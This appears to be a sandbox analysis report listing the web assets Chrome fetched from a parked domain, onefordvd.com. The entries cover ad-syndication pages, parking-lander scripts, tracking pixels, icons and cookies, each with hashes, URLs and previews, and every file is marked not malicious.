                                                                          Preview:if(!window['googleNDT_']){window['googleNDT_']=(new Date()).getTime();}(function() {window.googleAltLoader=3;var sffeData_={service_host:"syndicatedsearch.goog",hash:"12000867581486223255",packages:"domains",module:"ads",version:"1",m:{cei:"17300003,17301431,17301433,17301436,17301511,17301515,17301516,17301266",ah:true,uatm:500,ecfc2:true,llrm:1000,lldl:"bS5zZWFycy5jb20=",abf:{"_disableAdRequestForNewConsentStrategy":true,"_enableNewConsentStrategy":true,"_fixCtcLinksOnIos":true,"_googEnableQup":true,"_switchGwsRequestToUseAdsenseDomain":true,"_useServerProvidedDomain":true,"_waitOnConsentForFirstPartyCookie":true,"enableEnhancedTargetingRsonc":true,"enableNonblockingSasCookie":true},mdp:1800000,ssdl:"YXBwc3BvdC5jb20sYmxvZ3Nwb3QuY29tLGJyLmNvbSxjby5jb20sY2xvdWRmcm9udC5uZXQsZXUuY29tLGhvcHRvLm9yZyxpbi5uZXQsdHJhbnNsYXRlLmdvb2csdWsuY29tLHVzLmNvbSx3ZWIuYXBw",cdl:false,cdh:"syndicatedsearch.goog"}};var m;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (12974)
                                                                          Category:downloaded
                                                                          Size (bytes):24256
                                                                          Entropy (8bit):5.967861600992764
                                                                          Encrypted:false
                                                                          SSDEEP:384:2ni0Q8+t9/IQmDxvv5+Wah/FPuuzfspqNySMVtUO2:2i/8+txYDxvDahN2uzfEl5V92
                                                                          MD5:F733B2DB1463AEAFBAE38E95422B4D7F
                                                                          SHA1:ECEF91ECF6882B9F2138BAB39573A51538F973DD
                                                                          SHA-256:639183DC8567BF8ECD42BB959CCCC76698A17D165817AA0E69D6EBFDB3938EE0
                                                                          SHA-512:6293341A6ED6A1F1FF711C60C0127457561B9B1648B05B519C279F2FDC2292985E9898D3BD8577500625CE16B77F7A449A830B4EF5D1CD0D472B7597B2E59B8A
                                                                          Malicious:false
                                                                          URL:https://syndicatedsearch.goog/afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=1741724944339990&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944339992&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F
                                                                          Preview:<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:last-child{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.a{text-decoration:none; text-transform:none; color:inherit; display:inline-block;}.span{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;display:inline-block; overflow:hidden; text-transform:none;}.img{border:none; max-width:100%; max-height:100%;}.i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.j_>span:last-child, .j_>div:last-child, .w_, .w_:last-child{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;}.l_{-ms-overflow
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (53485)
                                                                          Category:dropped
                                                                          Size (bytes):54789
                                                                          Entropy (8bit):5.7184337937624
                                                                          Encrypted:false
                                                                          SSDEEP:768:jhGPNG7Dub8k1MufVVp8pMGry/xJlI/GZgvNpS4oPnhymHSaeCNMbUA9QK4K:jhGPMDub3lbmbyJXy1pGnhJtNMaK7
                                                                          MD5:8A4BE2DFF1E611A4A887F9C33A72745D
                                                                          SHA1:37A4CC80E94D0A04ED7D0DD9F2A744F8CC382477
                                                                          SHA-256:A9F8A66C0D0662183211328DDA01D3D3977E1E983AC2207CA650C9D5A3127F7B
                                                                          SHA-512:6B389B9F991D4A1805F540F555C4D1BF6EA8F441E4C44BC9210DE698ADCB42493DD02A3CB5D174F6855CF0E50C43638C4B74A7E2AE3504A30F401CE1B31142DC
                                                                          Malicious:false
                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function f(R){return R}var G=function(R,v,n,g,Y,l,p,B,Q,L,b,z){for(z=63,b=n;;)try{if(z==g)break;else if(z==21)z=B&&B.createPolicy?80:15;else if(z==v)b=n,z=45;else if(z==45)z=V.console?38:R;else{if(z==R)return b=n,Q;if(z==80)b=65,Q=B.createPolicy(l,{createHTML:w,createScript:w,createScriptURL:w}),z=R;else if(z==63)Q=p,B=V.trustedTypes,z=21;else if(z==38)V.console[Y](L.message),z=R;else if(z==15)return Q}}catch(W){if(b==n)throw W;b==65&&(L=W,z=v)}},w=function(R){return f.call(this,R)},V=this||self;(0,eval)(function(R,v){return(v=G(95,96,41,35,"error","bg",null))&&R.eval(v.createScript("1"))===1?function(n){return v.createScript(n)}:function(n){return""+n}}(V)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:applicatio
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:downloaded
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          URL:https://ad-delivery.net/px.gif?ch=1&e=0.7550573385120041
                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:downloaded
                                                                          Size (bytes):987
                                                                          Entropy (8bit):5.286413651830147
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yel+TLOwoeH6fvTdm1mh9dVbc8EDzzfXaH0Z4J6:YegLpafxwmPctzyHnJ6
                                                                          MD5:FBC4998F975B7B006E2B6842D740C3BA
                                                                          SHA1:A60EEF885CA5395D51277592D721D83E7067E2A6
                                                                          SHA-256:4AA19EE4A014A03581D838565B07FDEAE449CF344F43DBB065C43D3FBB514560
                                                                          SHA-512:18361A124B6EB483450315DBBC199BBDBE8E63CAB5352E662C6377F450878913B440AE7B9CAFA22081EB6586325281C485524B0FA08B226EDBAF219FE86C9CE0
                                                                          Malicious:false
                                                                          URL:https://api.aws.parking.godaddy.com/v1/domains/domain?domain=www.onefordvd.com&portfolioId=&abp=1&gdabp=true
                                                                          Preview:{"system":"SN","account":"11d1def534ea1be0X4316293fX15bcbce510bXX2f8e ","customerId":"00000000-0000-0000-0000-000000000000","displayType":"ADS","dataSource":"INVENTORY","adSense":{"drid":"as-drid-2412708874333548","channel":"06902","pubId":"dp-namemedia06_3ph"},"domain":{"rootDomain":"onefordvd.com","expiresAt":"","status":{"internal":"ACTIVE"},"isAdult":false,"hasAuction":false},"lander":{"template":"ARROW_3","domainDisplayName":"onefordvd.com","headerText":"","footerText":"","headerHtml":"","footerHtml":"","banner":{"show":true,"text":"onefordvd.com may be for sale!","link":"http://domainretailing.com/rg-dsale3p.php?d=onefordvd.com\u0026doe=YWNtZWJpbGxpbmdjb0BnbWFpbC5jb20%3D\u0026dil=SW5xdWlyZSBhYm91dA%3D%3D\u0026ct=teMjLe7_S","type":"AFTERNIC"},"i18n":true,"showDomain":true},"experiment":{"experiment":"parking_cp_ab_01","cohort":"off","start":"","end":"","enabled":true,"data":{"targetCustomerIds":["7dbc6047-87b6-4724-9c84-1e076f5b7c3d"],"useSerpForAdsenseFail":false}}}.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (380), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):380
                                                                          Entropy (8bit):5.419278885988979
                                                                          Encrypted:false
                                                                          SSDEEP:6:xWzPvGBqUsUwrbiFOjQS5Y2HuJPTv7M+dFECzUsUwrbmHqrpDV2HuJPTvAen:xWC63wOjQHNv7H+u3+2pD5Nv7n
                                                                          MD5:5B793A9E6CF8AE22AA0E19DBC16393B7
                                                                          SHA1:F3599E6412B0FDE3F6FAAA2158DC6AC9ADF6856F
                                                                          SHA-256:9D368D9E15F9E3C0BAF498E8CFF01F6F2937F217C385D2FB9D6206042F7F6021
                                                                          SHA-512:117003AE1692C5E5ADC3A51346EA38BB41D82F7383416D59B1EBEB0139421580B789855E3D96BCE8BC18FA3B587FB8C191065CBD1E71D2F8E876B30C0C775C2B
                                                                          Malicious:false
                                                                          Preview:__sasCookie({"_cookies_":[{"_value_":"ID=634cd3604e46b9f3:T=1724944345:RT=1724944345:S=ALNI_MbLv2NIfOmVecONWetOFaZ2lojbVg","_expires_":1758640345,"_path_":"/","_domain_":"onefordvd.com","_version_":1},{"_value_":"UID=00000eac5af454e0:T=1724944345:RT=1724944345:S=ALNI_Ma7Z7IjMA4BC7OVWp6HFiwj5Iam0Q","_expires_":1758640345,"_path_":"/","_domain_":"onefordvd.com","_version_":2}]});
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:downloaded
                                                                          Size (bytes):391
                                                                          Entropy (8bit):4.729520059969888
                                                                          Encrypted:false
                                                                          SSDEEP:6:t6q+mc4slzTPl2O4UYaeLIT4W+KS4S1UpMTQpi6jUs8sh6B+BSmK0C:t6q+FPUPkHSt1UiT6i6jUs8b0I0C
                                                                          MD5:1DD79DF28A7517F4F8688A66EDFB04FC
                                                                          SHA1:4AA1200E3E4B50AEB64774E6667DDE9422658C38
                                                                          SHA-256:5FC5D398706CE2D79CA71EAB32AB611D4511260B2D87B9D6D74A8EF59F9BEA8F
                                                                          SHA-512:70CD8282458482ED3F123C0E61C81D1C257C2D4AF12D51674BDF46C748B576CC92CC364CB7DC49D1D7E6D5A4C11AD85AA8E798692414468F0F4531DF95ECF326
                                                                          Malicious:false
                                                                          URL:https://afs.googleusercontent.com/ad_icons/standard/publisher_icon_image/search.svg?c=%230f1c21
                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" width="200" height="200" viewBox="0 0 24 24"><path d="M15.5 14h-.79l-.28-.27C15.41 12.59 16 11.11 16 9.5 16 5.91 13.09 3 9.5 3S3 5.91 3 9.5 5.91 16 9.5 16c1.61 0 3.09-.59 4.23-1.57l.27.28v.79l5 4.99L20.49 19l-4.99-5zm-6 0C7.01 14 5 11.99 5 9.5S7.01 5 9.5 5 14 7.01 14 9.5 11.99 14 9.5 14z"/><path d="M0 0h24v24H0z" fill="none"/></svg>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65465)
                                                                          Category:downloaded
                                                                          Size (bytes):691127
                                                                          Entropy (8bit):5.6159903673455736
                                                                          Encrypted:false
                                                                          SSDEEP:12288:Asb1QYnTxQYnT9DUk4f0WTI4WugqciqXDEu4Om4+BcWu2:A01QYnTxQYnTF4OH6
                                                                          MD5:35DF29B922F485757F6253377D2300F4
                                                                          SHA1:E579DF30408E9EE6670F9EFC3D8CA9AF4DF04D3E
                                                                          SHA-256:83DA041AD32EE87CB3FC0938C24D77625B66C109D0124A51047518D80D89422E
                                                                          SHA-512:4E8C780A286A1D81DDE2AA3D8126DEAFD0CD5ACC94F3BF75FCD548C98061FB4DD887D4007A6C6630CDD04CB0DAE3E288A4CE4195F5946B201DAFF68A476A2869
                                                                          Malicious:false
                                                                          URL:https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.js
                                                                          Preview:/*! For license information please see main.5bbf83b7.js.LICENSE.txt */.(()=>{var e={8665:e=>{"use strict";function t(e){return(t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}e.exports=function(){for(var e,n,r=[],o=window,i=o;i;){try{if(i.frames.__tcfapiLocator){e=i;break}}catch(e){}if(i===o.top)break;i=i.parent}e||(function e(){var t=o.document,n=!!o.frames.__tcfapiLocator;if(!n)if(t.body){var r=t.createElement("iframe");r.style.cssText="display:none",r.name="__tcfapiLocator",t.body.appendChild(r)}else setTimeout(e,5);return!n}(),o.__tcfapi=function(){for(var e=arguments.length,t=new Array(e),o=0;o<e;o++)t[o]=arguments[o];if(!t.length)return r;"setGdprApplies"===t[0]?t.length>3&&2===parseInt(t[1],10)&&"boolean"==typeof t[3]&&(n=t[3],"function"==typeof t[2]&&t[2]("set",!0)):"ping"===t[0]?"function"==typeof t[2]&&t[2]({gdprApplie
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows icon resource - 2 icons, 16x16, 16 colors, 32x32, 16 colors
                                                                          Category:dropped
                                                                          Size (bytes):1078
                                                                          Entropy (8bit):1.240940859118772
                                                                          Encrypted:false
                                                                          SSDEEP:3:etFEh9HYflvlNl/AXll1pe/WNN00000000000000000000000000000000000001:QNtY6+lKY6
                                                                          MD5:4123CE1E1732F202F60292941FF1487D
                                                                          SHA1:9F12B11BDE582DAE37CE8C160537D919C561C464
                                                                          SHA-256:D961B08E4321250926DE6F79087594975FE20AD1518DE8F91EB711AF5D1A6EF8
                                                                          SHA-512:11B24C2E622C408E4774FAE120B719A21A0B2ACFA53230126C35AD6CA57D33D4DE79CBE11D296CFBDE9613CAA03D66B721BD20CF4EE030CF75F5A1FD8A286DA9
                                                                          Malicious:false
                                                                          Preview:..............(...&... ..........N...(....... ...............................................................................................................................................................................................................................................................................................(... ...@.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:dropped
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):200
                                                                          Entropy (8bit):5.032268383518208
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WCCD/TSLvDmJS4RKb5sAR+hHiATcvXjXRHRcBHoNcH4VNX1X3MHq09e+HjdFsH:t6q+mc4slhohC/vmI4SmK0xhFELE47zF
                                                                          MD5:CDA1EC3580305080544D05765D14B5D5
                                                                          SHA1:49E3B7057B2A02843876BD4BA2D12629C53766C5
                                                                          SHA-256:81C042CDE00D76A79AEB2C402BF93BD34E31B3A0061D484519052E094686C75D
                                                                          SHA-512:FFEC368162234B6BBEF9791AA24013D256EB8660EDE3AB5A30225F91B6948710BA20A28C16213841494AEE550BE3B0095F8EF4A9F61B749EA61112C17CC5300B
                                                                          Malicious:false
                                                                          Preview:<svg fill='#0f1c21' xmlns="http://www.w3.org/2000/svg" height="24" viewBox="0 0 24 24" width="24"><path d="M0 0h24v24H0z" fill="none"/><path d="M5.88 4.12L13.76 12l-7.88 7.88L8 22l10-10L8 2z"/></svg>
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (53485)
                                                                          Category:downloaded
                                                                          Size (bytes):54789
                                                                          Entropy (8bit):5.7184337937624
                                                                          Encrypted:false
                                                                          SSDEEP:768:jhGPNG7Dub8k1MufVVp8pMGry/xJlI/GZgvNpS4oPnhymHSaeCNMbUA9QK4K:jhGPMDub3lbmbyJXy1pGnhJtNMaK7
                                                                          MD5:8A4BE2DFF1E611A4A887F9C33A72745D
                                                                          SHA1:37A4CC80E94D0A04ED7D0DD9F2A744F8CC382477
                                                                          SHA-256:A9F8A66C0D0662183211328DDA01D3D3977E1E983AC2207CA650C9D5A3127F7B
                                                                          SHA-512:6B389B9F991D4A1805F540F555C4D1BF6EA8F441E4C44BC9210DE698ADCB42493DD02A3CB5D174F6855CF0E50C43638C4B74A7E2AE3504A30F401CE1B31142DC
                                                                          Malicious:false
                                                                          URL:https://www.google.com/js/bg/qfimbA0GYhgyETKN2gHT05d-Hpg6wiB8plDJ1aMSf3s.js
                                                                          Preview://# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjogMywic291cmNlcyI6WyIiXSwic291cmNlc0NvbnRlbnQiOlsiICJdLCJuYW1lcyI6WyJjbG9zdXJlRHluYW1pY0J1dHRvbiJdLCJtYXBwaW5ncyI6IkFBQUE7QUFBQTtBQUFBO0FBQUE7QUFBQTtBQUFBO0FBQUEifQ==.(function(){function f(R){return R}var G=function(R,v,n,g,Y,l,p,B,Q,L,b,z){for(z=63,b=n;;)try{if(z==g)break;else if(z==21)z=B&&B.createPolicy?80:15;else if(z==v)b=n,z=45;else if(z==45)z=V.console?38:R;else{if(z==R)return b=n,Q;if(z==80)b=65,Q=B.createPolicy(l,{createHTML:w,createScript:w,createScriptURL:w}),z=R;else if(z==63)Q=p,B=V.trustedTypes,z=21;else if(z==38)V.console[Y](L.message),z=R;else if(z==15)return Q}}catch(W){if(b==n)throw W;b==65&&(L=W,z=v)}},w=function(R){return f.call(this,R)},V=this||self;(0,eval)(function(R,v){return(v=G(95,96,41,35,"error","bg",null))&&R.eval(v.createScript("1"))===1?function(n){return v.createScript(n)}:function(n){return""+n}}(V)(Array(Math.random()*7824|0).join("\n")+['//# sourceMappingURL=data:applicatio
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (57339)
                                                                          Category:downloaded
                                                                          Size (bytes):57340
                                                                          Entropy (8bit):5.401678356168753
                                                                          Encrypted:false
                                                                          SSDEEP:768:bemBuCcWxlPBJTEXIx5fR3VC/t1uYGW4hxaHNWy5N81Dju0GeNwXalBfDlOk7rr:zurqBaIzTCVcTqKZ5zDlOsr
                                                                          MD5:018A47EE5CE4DC09D3E5CEBC51E6256C
                                                                          SHA1:0481F7419F0581EC155AF41EB09027EDE1C64E09
                                                                          SHA-256:92FFB2AB4252AA702418251B600DC6790B589F3DEA50DACB90FC8B80FBF10802
                                                                          SHA-512:8BCF5B2CFF14ED4316543DB47B21EF148ADD8BC6D43D58504671F40EB144D29D6E614A664BE65DC794874984DF3E6589203E674F0C086F4B1E822D3A1C3E9A73
                                                                          Malicious:false
                                                                          URL:https://btloader.com/tag?o=5097926782615552&upapi=true
                                                                          Preview:!function(){"use strict";var e=function(){return e=Object.assign||function(e){for(var t,n=1,s=arguments.length;n<s;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e},e.apply(this,arguments)};function t(e,t,n,s){return new(n||(n=Promise))((function(r,i){function o(e){try{c(s.next(e))}catch(e){i(e)}}function a(e){try{c(s.throw(e))}catch(e){i(e)}}function c(e){var t;e.done?r(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(o,a)}c((s=s.apply(e,t||[])).next())}))}function n(e,t){var n,s,r,i,o={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return i={next:a(0),throw:a(1),return:a(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function a(i){return function(a){return function(i){if(n)throw new TypeError("Generator is already executing.");for(;o;)try{if(n=1,s&&(r=2&i[0]?s.return:i[0]?s.throw||((r=s.return)&&r.call(s),0):s.next)&&!(r=r.call(s,i[1])).done)return r;switch(s=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (619)
                                                                          Category:downloaded
                                                                          Size (bytes):620
                                                                          Entropy (8bit):5.148034538353215
                                                                          Encrypted:false
                                                                          SSDEEP:12:qTE0L26zFtAiSTFzU1UgYTJ5HSQHWVWSPD3LyVe2KPD3LqDsTbk:0E0LRzKTFjpn2WSaVpKSY/k
                                                                          MD5:8117A5188FFE6C4CD6C20DC344A14EF9
                                                                          SHA1:35AF3E72D99FE141FD469AE8AD40F284CAFB0B96
                                                                          SHA-256:42120BC8AC15E5139DF5594E8A5BEA9A74A681DA1C949B0EA6698BAD381F078D
                                                                          SHA-512:AD759E7F5210D080D85DD93129845F5085662F34390D1BC0D5E9673A484A3799D80E8C14B96AE4893449CF33DE599B3677873BE23F3ACFA4A65038A9E8DD0050
                                                                          Malicious:false
                                                                          URL:https://www.onefordvd.com/lander
                                                                          Preview:<!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1&gdabp=true"></script><script src="https://btloader.com/tag?o=5097926782615552&upapi=true" async></script><script>window.LANDER_SYSTEM="CP"</script><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/main.5bbf83b7.js"></script><link href="https://img1.wsimg.com/parking-lander/static/css/main.ef90a627.css" rel="stylesheet"></head><body><div id="root"></div></body></html>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:dropped
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:downloaded
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0950611313667666
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUMllRPQEsJ9pse:Gl3QEsJLse
                                                                          MD5:AD4B0F606E0F8465BC4C4C170B37E1A3
                                                                          SHA1:50B30FD5F87C85FE5CBA2635CB83316CA71250D7
                                                                          SHA-256:CF4724B2F736ED1A0AE6BC28F1EAD963D9CD2C1FD87B6EF32E7799FC1C5C8BDA
                                                                          SHA-512:EBFE0C0DF4BCC167D5CB6EBDD379F9083DF62BEF63A23818E1C6ADF0F64B65467EA58B7CD4D03CF0A1B1A2B07FB7B969BF35F25F1F8538CC65CF3EEBDF8A0910
                                                                          Malicious:false
                                                                          URL:https://ad-delivery.net/px.gif?ch=1&e=0.7379176731179411
                                                                          Preview:GIF89a.............!.......,...........L..;
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (57339)
                                                                          Category:dropped
                                                                          Size (bytes):57340
                                                                          Entropy (8bit):5.401678356168753
                                                                          Encrypted:false
                                                                          SSDEEP:768:bemBuCcWxlPBJTEXIx5fR3VC/t1uYGW4hxaHNWy5N81Dju0GeNwXalBfDlOk7rr:zurqBaIzTCVcTqKZ5zDlOsr
                                                                          MD5:018A47EE5CE4DC09D3E5CEBC51E6256C
                                                                          SHA1:0481F7419F0581EC155AF41EB09027EDE1C64E09
                                                                          SHA-256:92FFB2AB4252AA702418251B600DC6790B589F3DEA50DACB90FC8B80FBF10802
                                                                          SHA-512:8BCF5B2CFF14ED4316543DB47B21EF148ADD8BC6D43D58504671F40EB144D29D6E614A664BE65DC794874984DF3E6589203E674F0C086F4B1E822D3A1C3E9A73
                                                                          Malicious:false
                                                                          Preview:!function(){"use strict";var e=function(){return e=Object.assign||function(e){for(var t,n=1,s=arguments.length;n<s;n++)for(var r in t=arguments[n])Object.prototype.hasOwnProperty.call(t,r)&&(e[r]=t[r]);return e},e.apply(this,arguments)};function t(e,t,n,s){return new(n||(n=Promise))((function(r,i){function o(e){try{c(s.next(e))}catch(e){i(e)}}function a(e){try{c(s.throw(e))}catch(e){i(e)}}function c(e){var t;e.done?r(e.value):(t=e.value,t instanceof n?t:new n((function(e){e(t)}))).then(o,a)}c((s=s.apply(e,t||[])).next())}))}function n(e,t){var n,s,r,i,o={label:0,sent:function(){if(1&r[0])throw r[1];return r[1]},trys:[],ops:[]};return i={next:a(0),throw:a(1),return:a(2)},"function"==typeof Symbol&&(i[Symbol.iterator]=function(){return this}),i;function a(i){return function(a){return function(i){if(n)throw new TypeError("Generator is already executing.");for(;o;)try{if(n=1,s&&(r=2&i[0]?s.return:i[0]?s.throw||((r=s.return)&&r.call(s),0):s.next)&&!(r=r.call(s,i[1])).done)return r;switch(s=
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with very long lines (12970)
                                                                          Category:downloaded
                                                                          Size (bytes):13595
                                                                          Entropy (8bit):5.282074272247722
                                                                          Encrypted:false
                                                                          SSDEEP:96:2E/yk2iIlb5lphMzwronScptVYpZ+hvynNYrWItlPMADvw93DNw3AMADgw93DalY:2E12iMpgn3VYb+V+WrFlzb2ao67BO3
                                                                          MD5:E8842507E9A44FDAE5C3169A612A6A2D
                                                                          SHA1:D7BA8B0CE877F3D7D214AFA171EED4211EA13D57
                                                                          SHA-256:CB368A47AEB2AC7499D14D48D23C4616F9C42CA8396A2BE7B7DAEFBD9861962E
                                                                          SHA-512:A22174767CDD331AE8CC692B3CD93EB6DCA9EDF7B387FD689AAFEBC218DC3AA72992F6A2ADB2A7A314A0F9114CBC2FFC6762D7491375DD05A7F01DE9AAD909B3
                                                                          Malicious:false
                                                                          URL:https://syndicatedsearch.goog/afs/ads?adsafe=low&adtest=off&psid=7621175430&pcsa=false&channel=06902&domain_name=onefordvd.com&client=dp-namemedia06_3ph&r=m&rpbu=https%3A%2F%2Fwww.onefordvd.com%2Flander&type=3&uiopt=true&swp=as-drid-2412708874333548&oe=UTF-8&ie=UTF-8&fexp=21404%2C17301431%2C17301433%2C17301436%2C17301511%2C17301516%2C17301266&format=r3&nocache=2721724944340427&num=0&output=afd_ads&v=3&bsl=8&pac=0&u_his=1&u_tz=-240&dt=1724944340430&u_w=1280&u_h=1024&biw=1280&bih=907&psw=1280&psh=907&frm=0&uio=-&cont=relatedLinks&drt=0&jsid=caf&nfp=1&jsv=667606770&rurl=https%3A%2F%2Fwww.onefordvd.com%2Flander&referer=http%3A%2F%2Fwww.onefordvd.com%2F
                                                                          Preview:<!doctype html><html lang="en"> <head> <style id="ssr-boilerplate">body{-webkit-text-size-adjust:100%; font-family:arial,sans-serif; margin:0;}.div{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;max-width:100%;}.span:last-child, .div:last-child{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.a{text-decoration:none; text-transform:none; color:inherit; display:inline-block;}.span{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;display:inline-block; overflow:hidden; text-transform:none;}.img{border:none; max-width:100%; max-height:100%;}.i_{display:-ms-flexbox; display:-webkit-box; display:-webkit-flex; display:flex;-ms-flex-align:start; -webkit-box-align:start; -webkit-align-items:flex-start; align-items:flex-start;box-sizing:border-box; overflow:hidden;}.v_{-webkit-box-flex:1 0; -webkit-flex-shrink:1; flex-shrink:1;}.j_>span:last-child, .j_>div:last-child, .w_, .w_:last-child{-webkit-box-flex:0 0; -webkit-flex-shrink:0; flex-shrink:0;}.l_{-ms-overflow
